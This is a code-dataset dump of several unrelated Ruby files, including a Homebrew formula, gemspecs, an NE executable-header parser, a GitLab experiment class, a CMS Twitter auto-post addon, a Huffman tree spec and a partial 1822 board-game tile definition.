b96f717165824b0bbf0d87a859079018907b0508 | 1,354 | class Libxaw < Formula
desc "X.Org: X Athena Widget Set"
homepage "https://www.x.org/"
url "https://www.x.org/archive/individual/lib/libXaw-1.0.14.tar.bz2"
sha256 "76aef98ea3df92615faec28004b5ce4e5c6855e716fa16de40c32030722a6f8e"
license "MIT"
bottle do
sha256 arm64_big_sur: "6f9bd6bef10340da3fc23f24d0c4a4e3358dcbada118a8b74c4e05d901ac0dd6"
sha256 big_sur: "bceab125f7dc2fde90b23c68daf8d3a6b5fff65a0f3f3895abe750a74a328dc6"
sha256 catalina: "345ff906f7375ae71a550298fd482c849994ed25d0263822fe7ce8f3740db9f2"
sha256 mojave: "16cd8aec41f9df9798704213ac41b7e9013d1a8af9f4bda90bfb13d50e55f057"
end
depends_on "pkg-config" => :build
depends_on "libx11"
depends_on "libxext"
depends_on "libxmu"
depends_on "libxpm"
depends_on "libxt"
def install
args = %W[
--prefix=#{prefix}
--sysconfdir=#{etc}
--localstatedir=#{var}
--disable-dependency-tracking
--disable-silent-rules
--enable-specs=no
]
system "./configure", *args
system "make"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include "X11/Xaw/Text.h"
int main(int argc, char* argv[]) {
XawTextScrollMode mode;
return 0;
}
EOS
system ENV.cc, "test.c"
assert_equal 0, $CHILD_STATUS.exitstatus
end
end
| 27.08 | 92 | 0.692762 |
bfe9e2849b5f64577e0331d91709e1b39a3031c3 | 1,443 | # -*- encoding: utf-8 -*-
# stub: activemodel 5.1.6 ruby lib
Gem::Specification.new do |s|
s.name = "activemodel"
s.version = "5.1.6"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.metadata = { "changelog_uri" => "https://github.com/rails/rails/blob/v5.1.6/activemodel/CHANGELOG.md", "source_code_uri" => "https://github.com/rails/rails/tree/v5.1.6/activemodel" } if s.respond_to? :metadata=
s.require_paths = ["lib"]
s.authors = ["David Heinemeier Hansson"]
s.date = "2018-03-29"
s.description = "A toolkit for building modeling frameworks like Active Record. Rich support for attributes, callbacks, validations, serialization, internationalization, and testing."
s.email = "[email protected]"
s.homepage = "http://rubyonrails.org"
s.licenses = ["MIT"]
s.required_ruby_version = Gem::Requirement.new(">= 2.2.2")
s.rubygems_version = "2.5.1"
s.summary = "A toolkit for building modeling frameworks (part of Rails)."
s.installed_by_version = "2.5.1" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<activesupport>, ["= 5.1.6"])
else
s.add_dependency(%q<activesupport>, ["= 5.1.6"])
end
else
s.add_dependency(%q<activesupport>, ["= 5.1.6"])
end
end
| 41.228571 | 214 | 0.694387 |
62790ed47adbe86527a585c9fb51597940db4c64 | 945 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Apis
module ChromemanagementV1
# Version of the google-apis-chromemanagement_v1 gem
GEM_VERSION = "0.13.0"
# Version of the code generator used to generate this client
GENERATOR_VERSION = "0.4.0"
# Revision of the discovery document this client was generated from
REVISION = "20211112"
end
end
end
| 32.586207 | 74 | 0.733333 |
1a0c71cda5d503e674cf947f92223847150bc2a3 | 13,104 | class PEdump
# from wine's winnt.h
class NE < IOStruct.new 'a2CCvvVv4VVv8Vv3CCv4',
:ne_magic, # 00 NE signature 'NE'
:ne_ver, # 02 Linker version number
:ne_rev, # 03 Linker revision number
:ne_enttab, # 04 Offset to entry table relative to NE
:ne_cbenttab, # 06 Length of entry table in bytes
:ne_crc, # 08 Checksum
:ne_flags, # 0c Flags about segments in this file
:ne_autodata, # 0e Automatic data segment number
:ne_heap, # 10 Initial size of local heap
:ne_stack, # 12 Initial size of stack
:ne_csip, # 14 Initial CS:IP
:ne_sssp, # 18 Initial SS:SP
:ne_cseg, # 1c # of entries in segment table
:ne_cmod, # 1e # of entries in module reference tab.
:ne_cbnrestab, # 20 Length of nonresident-name table
:ne_segtab, # 22 Offset to segment table
:ne_rsrctab, # 24 Offset to resource table
:ne_restab, # 26 Offset to resident-name table
:ne_modtab, # 28 Offset to module reference table
:ne_imptab, # 2a Offset to imported name table
:ne_nrestab, # 2c Offset to nonresident-name table
:ne_cmovent, # 30 # of movable entry points
:ne_align, # 32 Logical sector alignment shift count
:ne_cres, # 34 # of resource segments
:ne_exetyp, # 36 Flags indicating target OS
:ne_flagsothers, # 37 Additional information flags
:ne_pretthunks, # 38 Offset to return thunks
:ne_psegrefbytes, # 3a Offset to segment ref. bytes
:ne_swaparea, # 3c Reserved by Microsoft
:ne_expver # 3e Expected Windows version number
attr_accessor :io, :offset
DEFAULT_CP = 1252
def self.cp
@@cp || DEFAULT_CP
end
def self.cp= cp
@@cp = cp
end
def self.read io, *args
self.cp = DEFAULT_CP
offset = io.tell
super.tap do |x|
x.io, x.offset = io, offset
end
end
class Segment < IOStruct.new 'v4',
:offset, :size, :flags, :min_alloc_size,
# manual:
:file_offset, :relocs
FLAG_RELOCINFO = 0x100
def data?
flags & 1 == 1
end
def code?
!data?
end
def flags_desc
r = code? ? 'CODE' : 'DATA'
r << ' ALLOC' if flags & 2 != 0
r << ' LOADED' if flags & 4 != 0
r << ((flags & 0x10 != 0) ? ' MOVABLE' : ' FIXED')
r << ((flags & 0x20 != 0) ? ' PURE' : '')
r << ((flags & 0x40 != 0) ? ' PRELOAD' : '')
if code?
r << ((flags & 0x80 != 0) ? ' EXECUTEONLY' : '')
else
r << ((flags & 0x80 != 0) ? ' READONLY' : '')
end
r << ((flags & FLAG_RELOCINFO != 0) ? ' RELOCINFO' : '')
r << ((flags & 0x200 != 0) ? ' DBGINFO' : '')
r << ((flags & 0x1000 != 0) ? ' DISCARD' : '')
r
end
end
class Reloc < IOStruct.new 'CCvvv',
:source, :type,
:offset, # offset of the relocation item within the segment
# If the relocation type is imported ordinal,
# the fifth and sixth bytes specify an index to a module's reference table and
# the seventh and eighth bytes specify a function ordinal value.
# If the relocation type is imported name,
# the fifth and sixth bytes specify an index to a module's reference table and
# the seventh and eighth bytes specify an offset to an imported-name table.
:module_idx,
:func_idx
TYPE_IMPORTORDINAL = 1
TYPE_IMPORTNAME = 2
end
def segments io=@io
@segments ||= io &&
begin
io.seek ne_segtab+@offset
ne_cseg.times.map{ Segment.read(io) }.each do |seg|
seg.file_offset = seg.offset << ne_align
seg.relocs = []
if (seg.flags & Segment::FLAG_RELOCINFO) != 0
io.seek seg.file_offset + seg.size
nRelocs = io.read(2).unpack('v').first
seg.relocs = nRelocs.times.map{ Reloc.read(io) }
end
end
end
end
class ResourceGroup < IOStruct.new 'vvV',
:type_id, :count, :reserved,
# manual:
:type, :children
def self.read io
super.tap do |g|
if g.type_id.to_i == 0
# type_id = 0 means end of resource groups
return nil
else
# read only if type_id is non-zero,
g.children = []
g.count.times do
break if io.eof?
g.children << ResourceInfo.read(io)
end
end
end
end
end
class ResourceInfo < IOStruct.new 'v4V',
:offset, :size, :flags, :name_offset, :reserved,
# manual:
:name
end
class Resource < PEdump::Resource
# NE strings use 8-bit characters
def parse f, h={}
self.data = []
case type
when 'STRING'
f.seek file_offset
16.times do
break if f.tell >= file_offset+self.size
nChars = f.getc.ord
t =
if nChars + 1 > self.size
# TODO: if it's not 1st string in table then truncated size must be less
PEdump.logger.error "[!] string size(#{nChars*2}) > stringtable size(#{self.size}). truncated to #{self.size-2}"
f.read(self.size-1)
else
f.read(nChars)
end
data <<
begin
t.force_encoding("CP#{h[:cp]}").encode!('UTF-8')
rescue
t.force_encoding('ASCII')
end
end
when 'VERSION'
f.seek file_offset
data << PEdump::NE::VS_VERSIONINFO.read(f)
else
super(f)
end
end
end
def _id2string id, io, res_base
if id & 0x8000 == 0
# offset to name
io.seek id + res_base
namesize = (io.getc || 0.chr).ord
io.read(namesize)
else
# numerical id
"##{id & 0x7fff}"
end
end
def resource_directory io=@io
@resource_directory ||=
begin
res_base = ne_rsrctab+@offset
io.seek res_base
res_shift = io.read(2).unpack('v').first
unless (0..16).include?(res_shift)
PEdump.logger.error "[!] invalid res_shift = %d" % res_shift
return []
end
PEdump.logger.info "[.] res_shift = %d" % res_shift
r = []
while !io.eof? && (g = ResourceGroup.read(io))
r << g
end
r.each do |g|
g.type = (g.type_id & 0x8000 != 0) && PEdump::ROOT_RES_NAMES[g.type_id & 0x7fff]
g.type ||= _id2string( g.type_id, io, res_base)
g.children.each do |res|
res.name = _id2string(res.name_offset, io, res_base)
res.offset ||= 0
res.offset <<= res_shift
res.size ||= 0
res.size <<= res_shift
end
end
r
end
end
def _detect_codepage a, io=@io
a.find_all{ |res| res.type == 'VERSION' }.each do |res|
res.parse(io)
res.data.each do |vi|
if vi.respond_to?(:Children) && vi.Children.respond_to?(:each)
# vi is PEdump::NE::VS_VERSIONINFO
vi.Children.each do |vfi|
if vfi.is_a?(PEdump::NE::VarFileInfo) && vfi.Children.is_a?(PEdump::NE::Var)
var = vfi.Children
# var is PEdump::NE::Var
if var.respond_to?(:Value) && var.Value.is_a?(Array) && var.Value.size == 2
return var.Value.last
end
end
end
end
end
end
nil
end
def resources io=@io
a = []
resource_directory(io).each do |grp|
grp.children.each do |res|
a << (r = Resource.new)
r.id = (res.name_offset & 0x7fff) if (res.name_offset & 0x8000) != 0
r.type = grp.type
r.size = res.size
r.name = res.name
r.file_offset = res.offset
r.reserved = res.reserved
end
end
# try to detect codepage
cp = _detect_codepage(a, io)
if cp
PEdump::NE.cp = cp # XXX HACK
PEdump.logger.info "[.] detect_codepage: #{cp.inspect}"
else
cp = DEFAULT_CP
PEdump.logger.info "[.] detect_codepage failed, using default #{cp}"
end
a.each{ |r| r.parse(io, :cp => cp) }
a
end
def imports io=@io
@imports ||=
begin
io.seek @offset+ne_modtab
modules = io.read(2*ne_cmod).unpack('v*')
modules.map! do |ofs|
io.seek @offset+ne_imptab+ofs
namelen = io.getc.ord
io.read(namelen)
end
r = []
segments(io).each do |seg|
seg.relocs.each do |rel|
if rel.type == Reloc::TYPE_IMPORTORDINAL
r << (f = PEdump::ImportedFunction.new)
f.module_name = modules[rel.module_idx-1]
f.ordinal = rel.func_idx
elsif rel.type == Reloc::TYPE_IMPORTNAME
r << (f = PEdump::ImportedFunction.new)
f.module_name = modules[rel.module_idx-1]
io.seek @offset+ne_imptab+rel.func_idx
namelen = io.getc.ord
f.name = io.read(namelen)
end
end
end
r
end
end
# first string with ordinal 0 is a module name
def exports io=@io
exp_dir = IMAGE_EXPORT_DIRECTORY.new
exp_dir.functions = []
io.seek @offset+ne_restab
while !io.eof && (namelen = io.getc.ord) > 0
exp_dir.functions << ExportedFunction.new( io.read(namelen), io.read(2).unpack('v').first, 0 )
end
exp_dir.name = exp_dir.functions.shift.name if exp_dir.functions.any?
a = []
io.seek ne_nrestab
while !io.eof && (namelen = io.getc.ord) > 0
a << ExportedFunction.new( io.read(namelen), io.read(2).unpack('v').first, 0 )
end
exp_dir.description = a.shift.name if a.any?
exp_dir.functions += a
exp_dir.functions.each do |f|
f.va = entrypoints[f.ord]
end
exp_dir
end
# The entry-table data is organized by bundle, each of which begins with a 2-byte header.
# The first byte of the header specifies the number of entries in the bundle ( 0 = end of the table).
# The second byte specifies whether the corresponding segment is movable or fixed.
# 0xFF = the segment is movable.
# 0xFE = the entry does not refer to a segment but refers to a constant defined within the module.
# else it is a segment index.
class Bundle < IOStruct.new 'CC', :num_entries, :seg_idx,
:entries # manual
FixedEntry = IOStruct.new 'Cv', :flag, :offset
MovableEntry = IOStruct.new 'CvCv', :flag, :int3F, :seg_idx, :offset
def movable?
seg_idx == 0xff
end
def self.read io
super.tap do |bundle|
return nil if bundle.num_entries == 0
if bundle.num_entries == 0
@@eob ||= 0
@@eob += 1
return nil if @@eob == 2
end
bundle.entries = bundle.seg_idx == 0 ? [] :
if bundle.movable?
bundle.num_entries.times.map{ MovableEntry.read(io) }
else
bundle.num_entries.times.map{ FixedEntry.read(io) }
end
end
end
end
def bundles io=@io
io.seek @offset+ne_enttab
bundles = []
while bundle = Bundle.read(io)
bundles << bundle
end
bundles
end
def entrypoints io=@io
@entrypoints ||=
begin
r = [0] # entrypoint indexes are 1-based
bundles(io).each do |b|
if b.entries.empty?
b.num_entries.times{ r<<0 }
else
b.entries.each do |e|
if e.is_a?(Bundle::MovableEntry)
r << (e.seg_idx<<16) + e.offset
elsif e.is_a?(Bundle::FixedEntry)
r << (b.seg_idx<<16) + e.offset
else
raise "invalid ep #{e.inspect}"
end
end
end
end
r
end
end
end
def ne f=@io
return @ne if defined?(@ne)
@ne ||=
begin
ne_offset = mz(f) && mz(f).lfanew
if ne_offset.nil?
logger.debug "[!] NULL NE offset (e_lfanew)."
nil
elsif ne_offset > f.size
logger.fatal "[!] NE offset beyond EOF."
nil
else
f.seek ne_offset
if f.read(2) == 'NE'
f.seek ne_offset
NE.read f
else
nil
end
end
end
end
end
| 30.760563 | 128 | 0.514957 |
182b904e9a307936dc848a4dee86067dd88f9316 | 1,212 | # -*- encoding: utf-8 -*-
# stub: mongoid_rateable 0.3.3 ruby lib
require File.expand_path('../lib/mongoid_rateable/version', __FILE__)
Gem::Specification.new do |s|
s.name = "mongoid_rateable"
s.version = MongoidRateable::VERSION
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Peter Savichev (proton)"]
s.date = "2014-06-21"
s.description = "Provides fields and methods for the rating manipulation on Mongoid documents."
s.email = "[email protected]"
s.extra_rdoc_files = [
"LICENSE.txt",
"README.rdoc",
"TODO"
]
s.files = `git ls-files`.split($\)
s.homepage = "http://github.com/proton/mongoid_rateable"
s.licenses = ["MIT"]
s.rubygems_version = "2.2.2"
s.summary = "Rating functionality for Mongoid documents"
s.add_runtime_dependency("mongoid", '~> 5.0')
s.add_dependency("bundler", "~> 1")
s.add_development_dependency("jeweler", "~> 1.6")
s.add_development_dependency("simplecov", "~> 0.4")
s.add_development_dependency("rdoc", "~> 3")
s.add_development_dependency("rspec", "~> 2.0")
s.add_development_dependency("database_cleaner", "~> 0")
end
| 32.756757 | 105 | 0.690594 |
7a314bca7b31a12994a7da0170d435c541b0e95b | 602 | Gem::Specification.new do |spec|
spec.name = "glpl"
spec.version = "0.2.0"
spec.date = Time.now.strftime("%Y-%m-%d")
spec.summary = "Gitlab Pipelines on your command line."
spec.description = "Gitlab Pipelines on your command line."
spec.authors = ["Dino"]
spec.email = "[email protected]"
spec.files = ["lib/glpl.rb"] + Dir["lib/glpl/*.rb"]
spec.license = "MIT"
spec.homepage = "https://github.com/joaofcosta/glpl"
spec.metadata = {"source_code_url" => "https://github.com/joaofcosta/glpl"}
spec.executables << "glpl"
end
| 40.133333 | 81 | 0.619601 |
ac90a7f71b038c28104fef378ef82865d425618c | 5,215 | module Cms::Addon
module TwitterPoster
extend ActiveSupport::Concern
include Cms::Content
extend SS::Addon
# media_ids is restricted up to 4
# see: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-update
TWITTER_MAX_MEDIA_COUNT = 4
included do
attr_accessor :skip_twitter_post
field :twitter_auto_post, type: String
field :twitter_post_format, type: String
field :twitter_edit_auto_post, type: String
field :twitter_posted, type: Array, default: [], metadata: { branch: false }
field :twitter_post_error, type: String, metadata: { branch: false }
permit_params :twitter_auto_post, :twitter_edit_auto_post, :twitter_post_format, :twitter_post_id, :twitter_user_id
validate :validate_twitter_postable, if: -> { twitter_auto_post == "active" }
after_save -> { post_to_twitter(execute: :job) }
end
def twitter_auto_post_options
%w(expired active).map { |v| [I18n.t("ss.options.state.#{v}"), v] }
end
def twitter_post_format_options
I18n.t("cms.options.twitter_post_format").map { |k, v| [v, k] }
end
def twitter_edit_auto_post_options
%w(disabled enabled).map { |v| [I18n.t("ss.options.state.#{v}"), v] }
end
def use_twitter_post?
twitter_auto_post == "active"
end
def twitter_edit_auto_post_enabled?
twitter_edit_auto_post == "enabled"
end
def twitter_url(post_id, user_id)
"https://twitter.com/#{user_id}/status/#{post_id}" if
use_twitter_post? && user_id.present? && post_id.present?
end
def twitter_post_enabled?
token_enabled = (site || @cur_site).try(:twitter_token_enabled?)
return false if !token_enabled
return false if skip_twitter_post.present?
return false if !use_twitter_post?
return false if respond_to?(:branch?) && branch?
if twitter_edit_auto_post_enabled?
# 再編集が有効の為、すでに投稿済みかをチェックしない。
else
return false if twitter_posted.present?
end
true
end
def connect_twitter
Twitter::REST::Client.new do |config|
config.consumer_key = self.site.twitter_consumer_key
config.consumer_secret = self.site.twitter_consumer_secret
config.access_token = self.site.twitter_access_token
config.access_token_secret = self.site.twitter_access_token_secret
end
end
def post_to_twitter(execute: :inline)
return unless public?
return unless public_node?
return if @posted_to_twitter
if twitter_post_enabled?
if execute == :job
Cms::SnsPost::TwitterJob.bind(site_id: @cur_site, user_id: @cur_user).perform_later(id)
else
execute_post_to_twitter
end
end
@posted_to_twitter = true
end
private
def validate_twitter_postable
policy = SS::UploadPolicy.upload_policy
if policy
msg = I18n.t("errors.messages.denied_with_upload_policy", policy: I18n.t("ss.options.upload_policy.#{policy}"))
errors.add :base, "#{t(:twitter_auto_post)}:#{msg}"
return
end
if twitter_post_format == "thumb_and_page" && thumb.blank?
errors.add :thumb_id, :blank
end
end
def execute_post_to_twitter
Cms::SnsPostLog::Twitter.create_with(self) do |log|
begin
posted_at = Time.zone.now
log.created = posted_at
message = "#{name}|#{full_url}?_=#{posted_at.to_i}"
client = connect_twitter
media_files = tweet_media_files
if media_files.present?
# 画像の添付があれば update_with_media を用いて投稿
log.action = "update_with_media"
log.message = message
log.media_files = media_files.map(&:path)
tweet = client.update_with_media(message, media_files)
else
# 画像の添付がなければ update を用いて投稿
log.action = "update"
log.message = message
tweet = client.update(message)
end
twitter_id = tweet.id
user_screen_id = client.user.screen_name
log.response_tweet = tweet.to_h.to_json
self.add_to_set(
twitter_posted: {
twitter_post_id: twitter_id.to_s,
twitter_user_id: user_screen_id,
posted_at: posted_at
}
)
self.unset(:twitter_edit_auto_post, :twitter_post_error) #編集時に投稿をリセット
log.state = "success"
rescue => e
Rails.logger.fatal("post_to_twitter failed: #{e.class} (#{e.message}):\n #{e.backtrace.join("\n ")}")
log.error = "post_to_twitter failed: #{e.class} (#{e.message}):\n #{e.backtrace.join("\n ")}"
self.set(twitter_post_error: "#{e.class} (#{e.message})")
end
end
end
def tweet_media_files
media_files = []
if twitter_post_format == "thumb_and_page" && thumb
media_files << thumb
elsif twitter_post_format == "files_and_page"
media_files = attached_files.select(&:image?).take(TWITTER_MAX_MEDIA_COUNT)
end
media_files.map { |file| ::File.new(file.path) }
end
end
end
| 31.79878 | 121 | 0.638926 |
6a7d2b110d3ae229ae15c16182daf6f5d88c8502 | 2,000 | # frozen_string_literal: true
module Members
class InviteEmailExperiment < ApplicationExperiment
exclude { context.actor.created_by.blank? }
exclude { context.actor.created_by.avatar_url.nil? }
INVITE_TYPE = 'initial_email'
def resolve_variant_name
RoundRobin.new(feature_flag_name, %i[avatar permission_info control]).execute
end
end
class RoundRobin
CacheError = Class.new(StandardError)
COUNTER_EXPIRE_TIME = 86400 # one day
def initialize(key, variants)
@key = key
@variants = variants
end
def execute
increment_counter
resolve_variant_name
end
# When the counter would expire
#
# @api private Used internally by SRE and debugging purpose
# @return [Integer] Number in seconds until expiration or false if never
def counter_expires_in
Gitlab::Redis::SharedState.with do |redis|
redis.ttl(key)
end
end
# Return the actual counter value
#
# @return [Integer] value
def counter_value
Gitlab::Redis::SharedState.with do |redis|
(redis.get(key) || 0).to_i
end
end
# Reset the counter
#
# @private Used internally by SRE and debugging purpose
# @return [Boolean] whether reset was a success
def reset!
redis_cmd do |redis|
redis.del(key)
end
end
private
attr_reader :key, :variants
# Increase the counter
#
# @return [Boolean] whether operation was a success
def increment_counter
redis_cmd do |redis|
redis.incr(key)
redis.expire(key, COUNTER_EXPIRE_TIME)
end
end
def resolve_variant_name
remainder = counter_value % variants.size
variants[remainder]
end
def redis_cmd
Gitlab::Redis::SharedState.with { |redis| yield(redis) }
true
rescue CacheError => e
Gitlab::AppLogger.warn("GitLab: An unexpected error occurred in writing to Redis: #{e}")
false
end
end
end
| 22.222222 | 94 | 0.6575 |
03ef600f269dd8185a51f010041ec80526b8e258 | 1,029 | require "spec_helper.rb"
module Huffman
describe Node do
context "with a particular binary tree" do
# We consider the tree example in the Readme
# 1
# / \
# 2 3
# / \ \
# 4 5 6
# / \ /
# 7 8 9
# Left part
n7 = Node.new(7)
n8 = Node.new(8)
n5 = Node.new(5,nil,n7,n8)
n4 = Node.new(4)
n2 = Node.new(2,nil,n4,n5)
# Right part
n9 = Node.new(9,nil)
n6 = Node.new(6,nil,n9)
n3 = Node.new(3,nil,nil,n6)
# Tree
tree = Node.new(1,nil,n2,n3)
it "can be visited by the preorder algorithm" do
tree.visit_and_map(:preorder){|node| node.value}.should == [1, 2, 4, 5, 7, 8, 3, 6, 9]
end
it "can be visited by the inorder algorithm" do
tree.visit_and_map(:inorder){|node| node.value}.should == [4, 2, 7, 5, 8, 1, 3, 9, 6]
end
it "can be visited by the postorder algorithm" do
tree.visit_and_map(:postorder){|node| node.value}.should == [4, 7, 8, 5, 2, 9, 6, 3, 1]
end
end
end
end | 23.930233 | 92 | 0.550049 |
91bdab97532b0fd97cc5e13c0e0744034ed7e1c1 | 77 | require 'test_helper'
class EqulpBoardHelperTest < ActionView::TestCase
end
| 15.4 | 49 | 0.831169 |
b9a9af6ecd8e5d8dacf9ce5b14feec55ee62d693 | 88 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'pry'
require 'todo'
| 22 | 58 | 0.715909 |
acca0005a6622ca146f314640027d1f2ffca5297 | 110,002 | # frozen_string_literal: true
require_relative 'meta'
require_relative '../base'
require_relative '../stubs_are_restricted'
module Engine
module Game
module G1822
class Game < Game::Base
include_meta(G1822::Meta)
register_colors(lnwrBlack: '#000',
gwrGreen: '#165016',
lbscrYellow: '#cccc00',
secrOrange: '#ff7f2a',
crBlue: '#5555ff',
mrRed: '#ff2a2a',
lyrPurple: '#2d0047',
nbrBrown: '#a05a2c',
swrGray: '#999999',
nerGreen: '#aade87',
black: '#000',
white: '#ffffff')
GAME_END_CHECK = { bank: :full_or, stock_market: :current_or }.freeze
BANKRUPTCY_ALLOWED = false
CURRENCY_FORMAT_STR = '£%d'
BANK_CASH = 12_000
CERT_LIMIT = { 3 => 26, 4 => 20, 5 => 16, 6 => 13, 7 => 11 }.freeze
STARTING_CASH = { 3 => 700, 4 => 525, 5 => 420, 6 => 350, 7 => 300 }.freeze
CAPITALIZATION = :incremental
MUST_SELL_IN_BLOCKS = false
TILES = {
'1' => 1,
'2' => 1,
'3' => 6,
'4' => 6,
'5' => 6,
'6' => 8,
'7' => 'unlimited',
'8' => 'unlimited',
'9' => 'unlimited',
'55' => 1,
'56' => 1,
'57' => 6,
'58' => 6,
'69' => 1,
'14' => 6,
'15' => 6,
'80' => 6,
'81' => 6,
'82' => 8,
'83' => 8,
'141' => 4,
'142' => 4,
'143' => 4,
'144' => 4,
'207' => 2,
'208' => 1,
'619' => 6,
'622' => 1,
'63' => 8,
'544' => 6,
'545' => 6,
'546' => 8,
'611' => 4,
'60' => 2,
'X20' =>
{
'count' => 1,
'color' => 'yellow',
'code' =>
'city=revenue:40;city=revenue:40;city=revenue:40;city=revenue:40;city=revenue:40;city=revenue:40;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;'\
'upgrade=cost:20;label=L',
},
'405' =>
{
'count' => 3,
'color' => 'green',
'code' => 'city=revenue:40,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:5,b:_0;label=T',
},
'X1' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:30,slots:3;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=C',
},
'X2' =>
{
'count' => 2,
'color' => 'green',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;'\
'path=a:4,b:_0;label=BM',
},
'X3' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:30,slots:2;path=a:1,b:_0;path=a:4,b:_0;label=S',
},
'X4' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:0;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0;upgrade=cost:100;label=EC',
},
'X21' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:60;city=revenue:60;city=revenue:60;city=revenue:60;city=revenue:60;city=revenue:60;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;'\
'upgrade=cost:20;label=L',
},
'145' =>
{
'count' => 4,
'color' => 'brown',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0',
},
'146' =>
{
'count' => 4,
'color' => 'brown',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0',
},
'147' =>
{
'count' => 6,
'color' => 'brown',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0',
},
'X5' =>
{
'count' => 3,
'color' => 'brown',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;'\
'path=a:4,b:_0;label=Y',
},
'X6' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:50,slots:3;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=C',
},
'X7' =>
{
'count' => 2,
'color' => 'brown',
'code' =>
'city=revenue:60,slots:4;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;'\
'path=a:5,b:_0;label=BM',
},
'X8' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:40,slots:2;path=a:1,b:_0;path=a:4,b:_0;label=S',
},
'X9' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:0,slots:2;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0,lanes:2;upgrade=cost:100;label=EC',
},
'X10' =>
{
'count' => 3,
'color' => 'brown',
'code' =>
'city=revenue:50,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:5,b:_0;label=T',
},
'X22' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:80;city=revenue:80;city=revenue:80;city=revenue:80;city=revenue:80;city=revenue:80;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;'\
'upgrade=cost:20;label=L',
},
'169' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'junction;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0',
},
'X11' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;label=Y',
},
'X12' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:3;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=C',
},
'X13' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:80,slots:4;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;'\
'path=a:5,b:_0;label=BM',
},
'X14' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:2;path=a:1,b:_0;path=a:4,b:_0;label=S',
},
'X15' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:0,slots:3;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0,lanes:2;label=EC',
},
'X16' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:5,b:_0;label=T',
},
'X17' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;path=a:5,b:_0',
},
'X18' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0',
},
'X19' =>
{
'count' => 4,
'color' => 'gray',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;'\
'path=a:5,b:_0',
},
'X23' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:100;city=revenue:100;city=revenue:100;city=revenue:100;city=revenue:100;'\
'city=revenue:100;path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;'\
'path=a:5,b:_5;label=L',
},
}.freeze
LOCATION_NAMES = {
'A42' => 'Cornwall',
'B43' => 'Plymouth',
'C34' => 'Fishguard',
'C38' => 'Barnstaple',
'D11' => 'Stranraer',
